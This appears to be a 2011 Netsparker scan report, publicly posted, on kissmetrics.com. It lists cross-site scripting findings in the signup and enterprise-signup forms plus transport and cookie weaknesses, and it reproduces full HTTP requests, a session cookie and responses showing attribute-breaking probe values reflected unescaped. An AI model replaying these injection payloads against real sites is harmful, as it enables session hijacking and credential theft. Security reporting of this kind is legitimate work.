kissmetrics.com, XSS, DORK, GHDB REPORT SUMMARY

Netsparker - Scan Report Summary

Target URL:                 https://www.kissmetrics.com/privacy
Scan Date:                  8/28/2011 3:34:54 PM
Report Date:                8/28/2011 6:18:34 PM
Scan Duration:              00:39:11
Total Requests:
Average Speed (req/sec.):

Findings: 17 identified, 8 confirmed, 0 critical, 2 informational

SCAN SETTINGS

Profile:          Previous Settings
Enabled Engines:  XSS
Authentication:
Scheduled:

VULNERABILITIES

Severity distribution (Netsparker - Web Application Security Scanner):
Important:    35 %
Medium:       35 %
Low:          18 %
Information:  12 %

VULNERABILITY SUMMARY

(A blank URL cell means the finding belongs to the URL shown on the nearest row above it.)

URL                     Parameter                     Method  Vulnerability                     Confirmed
/login                                                        Critical Form Served Over HTTP    Yes
/privacy                                                      Password Transmitted Over HTTP    Yes
                                                              Cookie Not Marked As Secure       Yes
                                                              Weak Ciphers Detected             Yes
                                                              Auto Complete Enabled             Yes
                                                              Cookie Not Marked As HttpOnly     Yes
                                                              E-mail Address Disclosure         No
/signup                 account%5bmeta%5d%5burl%5d    POST    Cross-site Scripting              No
                        account%5Bmeta%5D%5Burl%5D    POST    Cross-site Scripting              No
                        account%5bmeta%5d%5burl%5d    POST    [Possible] Cross-site Scripting   No
                        account%5Bmeta%5D%5Burl%5D    POST    [Possible] Cross-site Scripting   No
                                                              Internal Server Error             Yes
/signup/enterprise      request%5bemail%5d            POST    Cross-site Scripting              No
                        request%5Bemail%5D            POST    Cross-site Scripting              No
                        request%5bemail%5d            POST    [Possible] Cross-site Scripting   No
                        request%5Bemail%5D            POST    [Possible] Cross-site Scripting   No
/stylesheets/external/                                        Forbidden Resource                Yes
Cross-site Scripting

4 TOTAL - IMPORTANT
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This opens up several different attack opportunities, most commonly hijacking the user's current session or altering the page's HTML on the fly to steal the user's credentials. It happens because input entered by a user is interpreted as HTML, JavaScript or VBScript by the browser.

XSS targets the users of the application rather than the server. Although that limits its direct impact, it still lets an attacker hijack other users' sessions, and an attacker who targets an administrator can gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hijacking users' active sessions.
  • Changing the look of the page within the victim's browser.
  • Mounting a successful phishing attack.
  • Intercepting data and performing man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input to and output from the application should be filtered. Output should be filtered according to the output format and location; typically the output location is HTML. Where the output is HTML, ensure that all active content is removed before it is presented to the browser.

Before sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which to populate a whitelist. This list needs to be defined only once and should be used to sanitize and validate all subsequent input.

A number of pre-defined, well-structured whitelist libraries are available for many different environments; OWASP Reform and the Microsoft Anti-Cross Site Scripting Library are good examples.

Classification

OWASP A2, PCI v1.2-6.5.1, PCI v2.0-6.5.7, CWE-79, CAPEC-19, WASC-08
- /signup
  https://www.kissmetrics.com/signup

Parameters

Parameter                             Type  Value
trp                                   POST  30
account%5bmeta%5d%5bname%5d           POST  Smith
account%5bname%5d                     POST  Smith
account%5bmeta%5d%5bcompany_size%5d   POST  1 to 5 people
account%5bmeta%5d%5burl%5d            POST  '" ns= alert(0x0004EF)
user%5blogin%5d                       POST  3
account%5bmeta%5d%5bphone%5d          POST  3
user%5bnew_password%5d                POST  3

Request

POST /signup HTTP/1.1
Referer: https://www.kissmetrics.com/signup/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Content-Length: 254
Expect: 100-continue
Accept-Encoding: gzip, deflate

trp=30&account%5bmeta%5d%5bname%5d=Smith&account%5bname%5d=Smith&account%5bmeta%5d%5bcompany_size%5d=1+to+5+people&account%5bmeta%5d%5burl%5d=%27%22%20ns=%20netsparker(0x0004EF)%20&user%5blogin%5d=3&account%5bmeta%5d%5bphone%5d=3&user%5bnew_password%5d=3

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:52:54 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive


<!DOCTYPE html><html> <head> <title>Sign up for KISSmetrics - 30 day free trial</title> <!-- Meta --> <meta charset="utf-8" /> <meta name="description" content="Experience the most powerful Web Analytics. There’s no risk, no obligation and no credit card required. You can cancel your account at any time." /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="apple-touch-icon-precomposed" href="/apple-icon.png" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/shell.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Rokkitt"> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Maven+Pro:regular,500"> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link rel="stylesheet" href="/stylesheets/external/signup.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="/stylesheets/external/concentrate.css?r=1669" type="text/css" media="all" charset="utf-8" /> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } 
_kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <header> <div class="inner"> <div class="sm_btns"> <a href="/login" id="sign_in_btn" title="Please sign in"><img src="/images/external/sign_in_icon.png" height="8" width="9" alt="Sign in icon" /><span>Sign in</span></a> </div><!-- /.sm_btns --> <a href="/about/work#listings" id="hire_btn" title="We're hiring. Click here to learn more."><img src="/images/external/in_icon.png" height="9" width="9" alt="" /><span>We&rsquo;re hiring</span></a> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <nav> <ul> <li class="what_nav"><a href="/what" title="Learn more about KISSmetrics">What is KISSmetrics?</a></li> <li class="about_nav" title="Learn more about our team"><a href="/about">About us</a></li> <li class="trial_nav active"><a href="/signup/pricing" class="Get a free trial of KISSmetrics">Start your free trial</a></li> </ul> </nav> <div class="title"> <h1>Sign up<span class="colon">:</span> <small>Start your free 30 day trial now</small></h1> <p class="call">Call us at <strong>+1 (888) 767-5477</strong> to have a chat.</p></div><!-- /.title --><hr /><ul class="sub_nav"> <li class="trial_sub_nav active"> <a href="/signup"><strong>Start your free 30 day trial</strong><br />No risk, no obligation, no credit card required.</a> </li> <li class="pricing_sub_nav"> <a href="/signup/pricing"><strong>Pricing options</strong><br />Flexible month to month pricing plans.</a> </li> <li class="enterprise_sub_nav"> <a href="/signup/enterprise"><strong>Request a demo</strong><br />To see how it works, let&rsquo;s talk.</a> </li></ul> </div><!-- /.inner --> </header> <section id="main"> <div class="inner"> <div class="title"> <h2>Start your free 30 day trial</h2> <p>There&rsquo;s no risk, no obligation and no credit card required. 
You can cancel your account at any time by simply clicking on the &ldquo;account settings&rdquo; link on your dashboard.</p></div><!-- /.title --><div class="trial col"> <!--<h3>Improve your conversion rate and increase your revenue&hellip;starting now.</h3> <p>KISSmetrics is focused in improving the metrics that really matter to your business.</p>--> <form action="/signup" method="post" id="signup_form"> <input name="trp" value="30" type="hidden"/> <h3>KISSmetrics free trial sign up</h3> <p>You are only a few steps away from starting your free KISSmetrics trial. Create an account name and password and you&rsquo;ll be all set.</p> <hr class="thin" /> <fieldset> <p> <label for="your_name">Your name:</label> <input class="text" name="account[meta][name]" value="Smith" id="your_name" type="text"/> </p> <p class="half"> <label for="account_name">Company name:</label> <input class="text" name="account[name]" value="Smith" id="account_name" type="text"/> </p> <p class="half"> <label for="account[meta][company_size]">Company size:</label> <select name="account[meta][company_size]"><option value="1 to 5 people" selected="selected">1 to 5 people</option><option value="6 to 10 people">6 to 10 people</option><option value="11 to 25 people">11 to 25 people</option><option value="26 to 50 people">26 to 50 people</option><option value="51 to 200 people">51 to 200 people</option><option value="201 or more people">201 or more people</option></select> </p> <p class="clear"> <label for="account[meta][url]">Company Website:</label> <input type="text" class="text" name="account[meta][url]" value="'" ns= netsparker(0x0004EF) " /> </p> <p class="half"> <label for="email">Email address:</label> <input class="text" name="user[login]" value="3" id="email" type="text"/> <span class="error">E-mail does not appear to be valid</span> </p> <p class="half"> <label for="account[meta][phone]">Telephone number:</label> <input class="text" name="account[meta][phone]" value="3" type="text"/> </p> <p 
class="clear"> <label for="password">Password:</label> <input class="text" name="user[new_password]" value="" id="new_password" type="password"/> <span class="error">New password must be at least 5 chars</span> </p> <div style="visibility:none;overflow:hidden;height:0;width:0;"><input type="submit" value="Submit" /></div> <p> <a href="#" onclick="if(!this.submitted){this.submitted=true;$('#signup_form').submit();} return false" class="blue button with_arrow">Create my account</a> <span class="note">By clicking the button above, you are agreeing with our <a href="/terms" target="_blank">Terms</a>.</span> </p> </fieldset> </form></div><!-- /.col --><div class="trial col side"> <p>Does your site have a huge number of active customers? Congratulations! We can handle it. KISSmetrics is already serving a number of customers who are sending us the actions of millions of people per day. <a href="/signup/enterprise">Contact us for more information.</a></p></div><!-- /.trial.col.side --><!--<hr /><ul class="faq"> <li> <h3>How does the 30-day free trial work?</h3> <p>There&rsquo;s no risk, no obligation and no credit card required. You can cancel your account at any time by simply clicking on the &ldquo;account settings&rdquo; link on your dashboard.</p> </li> <li> <h3>What if I go over my plan limits?</h3> <p>During the 30-day free trial there are no overage fees. After the 30-day trial is over you will not be charged any overage fees for the first month that you go over. You can upgrade to a higher plan and you will be charged for that plan starting with the next billing cycle.</p> </li> <li> <h3>Can I change plans at any time?</h3> <p>Changing plans is really simple. You can upgrade or downgrade your plan at any time. If you are upgrading to a higher plan, you will be upgraded immediately but not be charged until the next billing cycle.</p> </li> <li> <h3>Is there a minimum commitment?</h3> <p>KISSmetrics is a month to month service. 
There is no contract or long term obligation. You are billed on a monthly basis, and if you cancel you will not be billed again.</p> </li> <li> <h3>What are my payment options?</h3> <p>We accept Visa, Mastercard, American Express and Discover through our online payment system. If you would like to prepay for 12 months you can pay with an invoice. Please contact us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a> for more information.</p> </li> <li> <h3>Where can I review the terms of service and privacy policy?</h3> <p>Here are our <a href="/terms">Terms of Service</a> and <a href="/privacy">Privacy Policy</a>.</p> </li></ul>--><br style="clear:both;" /> </div><!-- /.inner --> </section> <footer> <section class="more"> <div class="inner"> <p>KISSmetrics on the web: &nbsp;<a href="http://twitter.com/#!/kissmetrics" target="_new" class="twitter" title="Follow us on Twitter">Twitter</a> <a href="http://www.facebook.com/KISSmetrics" target="_new" class="facebook" title="Join us on Facebook">Facebook</a> <a href="http://kissmetrics.tumblr.com" target="_new" class="tumblr" title="Follow us on Tumblr">Tumblr</a> <a href="http://blog.kissmetrics.com" target="_new" class="blog" title="Visit the KISSmetrics Marketing Blog">Blog</a></p> <nav> <ul> <li><a href="http://blog.kissmetrics.com" target="_new" title="Visit the KISSmetrics Marketing Blog">Blog</a></li> <li><a href="/contact" title="Contact us">Contact</a></li> <li><a href="http://support.kissmetrics.com" target="_new" title="Visit our support site">Help</a></li> <li><a href="/terms" title="Terms of Use">Terms of Use</a></li> <li><a href="/privacy" title="Privacy Policy">Privacy Policy</a></li> <!--<li><a href="/security">Security</a></li>--> </ul> </nav> </div> </section> <section class="about cf"> <div class="inner"> <div class="col detail"> <h3>What is KISSmetrics?</h3> <p>Use KISSmetrics to increase purchases on your website by visualizing your online sales funnels and figuring out which 
campaigns are driving revenue and which ones aren&rsquo;t. <a href="/what">Learn more about how we can help you</a>.</p> <h3>Want to have a chat? Call us at <strong>+1 (888) 767-5477</strong></h3> <p>or email us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a>.</p> </div><!-- /.col --> <div class="col gdd"> <h3>We also provide free tools to help you get started on your path to becoming data driven</h3> <p><img src="/images/external/get_data_driven.png" height="52" width="187" alt="Get Data Driven" />Ever wonder how much revenue you could gain with a 5% improvement on your conversion rate? At KISSmetrics, we are working on giving you the tools to start driving your decisions with data. <a href="http://getdatadriven.com/" target="_new">Get Data Driven, subscribe to our weekly email newsletter</a>.</p> <!--<h3>Overheard on Twitter</h3> <ul class="overheard"> <li> <strong class="by"><a href="#">6 hours ago by Melody McCloskey</a></strong> <br /> Deep dive into KISSmetrics to measure our funnels/user paths, so far I’m impressed! </li> <li> <strong class="by"><a href="#">23 hours ago by gabyingreen</a></strong> <br /> I just love Inforgraphics! Check out this infographic by @KISSmetrics showing @Twitter&rsquo;s growth statistics <a href="#">http://kiss.ly/esKzFU</a> #measure </li> </ul>--> </div><!-- /.col --> </div><!-- /.inner --> </section> <div class="inner"> <p class="copyright">&copy; Copyright 2011 KISSmetrics. 
All rights reserved.</p> <a href="/signup" class="teal button with_arrow" title="Get started with KISSmetrics today!">Get started with KISSmetrics today!</a> </div><!-- /.inner --> </footer> <div id="signin_modal" style="display: none"> <div class="modal"> <div class="modal-inner" id="signin_content"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Sign into KISSmetrics</h3> </div> <div class="content"> <form action="/login" id="signin_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p> <label for="email">Password:</label> <input type="password" class="text" name="password" id="password" /><br /> <span class="forgot"><a href="#">Forgot password?</a></span> </p> <p class="buttons"><a href="#" onclick="$('#signin_form').submit(); return false;" class="blue button with_arrow">Sign in</a> <input type="checkbox" name="remember_me" value="1" checked="checked" /> Keep me signed in for two weeks</p> </form> </div> </div> <div class="modal-inner" id="forgot_content" style="display:none;"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Forgot your password?</h3> </div> <div class="content"> <p>Enter your email address below and we&rsquo;ll send you instructions.</p> <hr /> <form action="/forgot_password" id="forgot_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="te..
- /signup
  https://www.kissmetrics.com/signup

Parameters

Parameter                             Type  Value
trp                                   POST  30
account%5Bmeta%5D%5Bname%5D           POST  Smith
account%5Bname%5D                     POST  Smith
account%5Bmeta%5D%5Burl%5D            POST  '" ns= alert(0x0004F1)
user%5Blogin%5D                       POST  3
account%5Bmeta%5D%5Bphone%5D          POST  3
user%5Bnew_password%5D                POST  3

Request

POST /signup HTTP/1.1
Referer: https://www.kissmetrics.com/signup/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Content-Length: 204
Expect: 100-continue
Accept-Encoding: gzip, deflate

trp=30&account%5Bmeta%5D%5Bname%5D=Smith&account%5Bname%5D=Smith&account%5Bmeta%5D%5Burl%5D=%27%22%20ns=%20netsparker(0x0004F1)%20&user%5Blogin%5D=3&account%5Bmeta%5D%5Bphone%5D=3&user%5Bnew_password%5D=3

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:53:52 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive


<!DOCTYPE html><html> <head> <title>Sign up for KISSmetrics - 30 day free trial</title> <!-- Meta --> <meta charset="utf-8" /> <meta name="description" content="Experience the most powerful Web Analytics. There’s no risk, no obligation and no credit card required. You can cancel your account at any time." /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="apple-touch-icon-precomposed" href="/apple-icon.png" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/shell.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Rokkitt"> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Maven+Pro:regular,500"> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link rel="stylesheet" href="/stylesheets/external/signup.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="/stylesheets/external/concentrate.css?r=1669" type="text/css" media="all" charset="utf-8" /> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } 
_kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <header> <div class="inner"> <div class="sm_btns"> <a href="/login" id="sign_in_btn" title="Please sign in"><img src="/images/external/sign_in_icon.png" height="8" width="9" alt="Sign in icon" /><span>Sign in</span></a> </div><!-- /.sm_btns --> <a href="/about/work#listings" id="hire_btn" title="We're hiring. Click here to learn more."><img src="/images/external/in_icon.png" height="9" width="9" alt="" /><span>We&rsquo;re hiring</span></a> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <nav> <ul> <li class="what_nav"><a href="/what" title="Learn more about KISSmetrics">What is KISSmetrics?</a></li> <li class="about_nav" title="Learn more about our team"><a href="/about">About us</a></li> <li class="trial_nav active"><a href="/signup/pricing" class="Get a free trial of KISSmetrics">Start your free trial</a></li> </ul> </nav> <div class="title"> <h1>Sign up<span class="colon">:</span> <small>Start your free 30 day trial now</small></h1> <p class="call">Call us at <strong>+1 (888) 767-5477</strong> to have a chat.</p></div><!-- /.title --><hr /><ul class="sub_nav"> <li class="trial_sub_nav active"> <a href="/signup"><strong>Start your free 30 day trial</strong><br />No risk, no obligation, no credit card required.</a> </li> <li class="pricing_sub_nav"> <a href="/signup/pricing"><strong>Pricing options</strong><br />Flexible month to month pricing plans.</a> </li> <li class="enterprise_sub_nav"> <a href="/signup/enterprise"><strong>Request a demo</strong><br />To see how it works, let&rsquo;s talk.</a> </li></ul> </div><!-- /.inner --> </header> <section id="main"> <div class="inner"> <div class="title"> <h2>Start your free 30 day trial</h2> <p>There&rsquo;s no risk, no obligation and no credit card required. 
You can cancel your account at any time by simply clicking on the &ldquo;account settings&rdquo; link on your dashboard.</p></div><!-- /.title --><div class="trial col"> <!--<h3>Improve your conversion rate and increase your revenue&hellip;starting now.</h3> <p>KISSmetrics is focused in improving the metrics that really matter to your business.</p>--> <form action="/signup" method="post" id="signup_form"> <input name="trp" value="30" type="hidden"/> <h3>KISSmetrics free trial sign up</h3> <p>You are only a few steps away from starting your free KISSmetrics trial. Create an account name and password and you&rsquo;ll be all set.</p> <hr class="thin" /> <fieldset> <p> <label for="your_name">Your name:</label> <input class="text" name="account[meta][name]" value="Smith" id="your_name" type="text"/> </p> <p class="half"> <label for="account_name">Company name:</label> <input class="text" name="account[name]" value="Smith" id="account_name" type="text"/> </p> <p class="half"> <label for="account[meta][company_size]">Company size:</label> <select name="account[meta][company_size]"><option value="1 to 5 people">1 to 5 people</option><option value="6 to 10 people">6 to 10 people</option><option value="11 to 25 people">11 to 25 people</option><option value="26 to 50 people">26 to 50 people</option><option value="51 to 200 people">51 to 200 people</option><option value="201 or more people">201 or more people</option></select> </p> <p class="clear"> <label for="account[meta][url]">Company Website:</label> <input type="text" class="text" name="account[meta][url]" value="'" ns= netsparker(0x0004F1) " /> </p> <p class="half"> <label for="email">Email address:</label> <input class="text" name="user[login]" value="3" id="email" type="text"/> <span class="error">E-mail does not appear to be valid</span> </p> <p class="half"> <label for="account[meta][phone]">Telephone number:</label> <input class="text" name="account[meta][phone]" value="3" type="text"/> </p> <p class="clear"> 
<label for="password">Password:</label> <input class="text" name="user[new_password]" value="" id="new_password" type="password"/> <span class="error">New password must be at least 5 chars</span> </p> <div style="visibility:none;overflow:hidden;height:0;width:0;"><input type="submit" value="Submit" /></div> <p> <a href="#" onclick="if(!this.submitted){this.submitted=true;$('#signup_form').submit();} return false" class="blue button with_arrow">Create my account</a> <span class="note">By clicking the button above, you are agreeing with our <a href="/terms" target="_blank">Terms</a>.</span> </p> </fieldset> </form></div><!-- /.col --><div class="trial col side"> <p>Does your site have a huge number of active customers? Congratulations! We can handle it. KISSmetrics is already serving a number of customers who are sending us the actions of millions of people per day. <a href="/signup/enterprise">Contact us for more information.</a></p></div><!-- /.trial.col.side --><!--<hr /><ul class="faq"> <li> <h3>How does the 30-day free trial work?</h3> <p>There&rsquo;s no risk, no obligation and no credit card required. You can cancel your account at any time by simply clicking on the &ldquo;account settings&rdquo; link on your dashboard.</p> </li> <li> <h3>What if I go over my plan limits?</h3> <p>During the 30-day free trial there are no overage fees. After the 30-day trial is over you will not be charged any overage fees for the first month that you go over. You can upgrade to a higher plan and you will be charged for that plan starting with the next billing cycle.</p> </li> <li> <h3>Can I change plans at any time?</h3> <p>Changing plans is really simple. You can upgrade or downgrade your plan at any time. If you are upgrading to a higher plan, you will be upgraded immediately but not be charged until the next billing cycle.</p> </li> <li> <h3>Is there a minimum commitment?</h3> <p>KISSmetrics is a month to month service. There is no contract or long term obligation. 
You are billed on a monthly basis, and if you cancel you will not be billed again.</p> </li> <li> <h3>What are my payment options?</h3> <p>We accept Visa, Mastercard, American Express and Discover through our online payment system. If you would like to prepay for 12 months you can pay with an invoice. Please contact us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a> for more information.</p> </li> <li> <h3>Where can I review the terms of service and privacy policy?</h3> <p>Here are our <a href="/terms">Terms of Service</a> and <a href="/privacy">Privacy Policy</a>.</p> </li></ul>--><br style="clear:both;" /> </div><!-- /.inner --> </section> <footer> <section class="more"> <div class="inner"> <p>KISSmetrics on the web: &nbsp;<a href="http://twitter.com/#!/kissmetrics" target="_new" class="twitter" title="Follow us on Twitter">Twitter</a> <a href="http://www.facebook.com/KISSmetrics" target="_new" class="facebook" title="Join us on Facebook">Facebook</a> <a href="http://kissmetrics.tumblr.com" target="_new" class="tumblr" title="Follow us on Tumblr">Tumblr</a> <a href="http://blog.kissmetrics.com" target="_new" class="blog" title="Visit the KISSmetrics Marketing Blog">Blog</a></p> <nav> <ul> <li><a href="http://blog.kissmetrics.com" target="_new" title="Visit the KISSmetrics Marketing Blog">Blog</a></li> <li><a href="/contact" title="Contact us">Contact</a></li> <li><a href="http://support.kissmetrics.com" target="_new" title="Visit our support site">Help</a></li> <li><a href="/terms" title="Terms of Use">Terms of Use</a></li> <li><a href="/privacy" title="Privacy Policy">Privacy Policy</a></li> <!--<li><a href="/security">Security</a></li>--> </ul> </nav> </div> </section> <section class="about cf"> <div class="inner"> <div class="col detail"> <h3>What is KISSmetrics?</h3> <p>Use KISSmetrics to increase purchases on your website by visualizing your online sales funnels and figuring out which campaigns are driving revenue and which ones 
aren&rsquo;t. <a href="/what">Learn more about how we can help you</a>.</p> <h3>Want to have a chat? Call us at <strong>+1 (888) 767-5477</strong></h3> <p>or email us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a>.</p> </div><!-- /.col --> <div class="col gdd"> <h3>We also provide free tools to help you get started on your path to becoming data driven</h3> <p><img src="/images/external/get_data_driven.png" height="52" width="187" alt="Get Data Driven" />Ever wonder how much revenue you could gain with a 5% improvement on your conversion rate? At KISSmetrics, we are working on giving you the tools to start driving your decisions with data. <a href="http://getdatadriven.com/" target="_new">Get Data Driven, subscribe to our weekly email newsletter</a>.</p> <!--<h3>Overheard on Twitter</h3> <ul class="overheard"> <li> <strong class="by"><a href="#">6 hours ago by Melody McCloskey</a></strong> <br /> Deep dive into KISSmetrics to measure our funnels/user paths, so far I’m impressed! </li> <li> <strong class="by"><a href="#">23 hours ago by gabyingreen</a></strong> <br /> I just love Inforgraphics! Check out this infographic by @KISSmetrics showing @Twitter&rsquo;s growth statistics <a href="#">http://kiss.ly/esKzFU</a> #measure </li> </ul>--> </div><!-- /.col --> </div><!-- /.inner --> </section> <div class="inner"> <p class="copyright">&copy; Copyright 2011 KISSmetrics. 
All rights reserved.</p> <a href="/signup" class="teal button with_arrow" title="Get started with KISSmetrics today!">Get started with KISSmetrics today!</a> </div><!-- /.inner --> </footer> <div id="signin_modal" style="display: none"> <div class="modal"> <div class="modal-inner" id="signin_content"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Sign into KISSmetrics</h3> </div> <div class="content"> <form action="/login" id="signin_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p> <label for="email">Password:</label> <input type="password" class="text" name="password" id="password" /><br /> <span class="forgot"><a href="#">Forgot password?</a></span> </p> <p class="buttons"><a href="#" onclick="$('#signin_form').submit(); return false;" class="blue button with_arrow">Sign in</a> <input type="checkbox" name="remember_me" value="1" checked="checked" /> Keep me signed in for two weeks</p> </form> </div> </div> <div class="modal-inner" id="forgot_content" style="display:none;"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Forgot your password?</h3> </div> <div class="content"> <p>Enter your email address below and we&rsquo;ll send you instructions.</p> <hr /> <form action="/forgot_password" id="forgot_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> <..
- /signup/enterprise

/signup/enterprise

https://www.kissmetrics.com/signup/enterprise

Parameters

Parameter Type Value
request%5bfirst_name%5d POST Smith
request%5blast_name%5d POST Smith
request%5bcompany%5d POST 3
request%5bcompany_size%5d POST 1 to 5 people
request%5burl%5d POST 3
request%5bemail%5d POST '" ns= alert(0x0006C3)
request%5bphone%5d POST 3

Request

POST /signup/enterprise HTTP/1.1
Referer: https://www.kissmetrics.com/signup/enterprise
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Content-Length: 219
Expect: 100-continue
Accept-Encoding: gzip, deflate

request%5bfirst_name%5d=Smith&request%5blast_name%5d=Smith&request%5bcompany%5d=3&request%5bcompany_size%5d=1+to+5+people&request%5burl%5d=3&request%5bemail%5d=%27%22%20ns=%20netsparker(0x0006C3)%20&request%5bphone%5d=3

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 21:04:50 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive


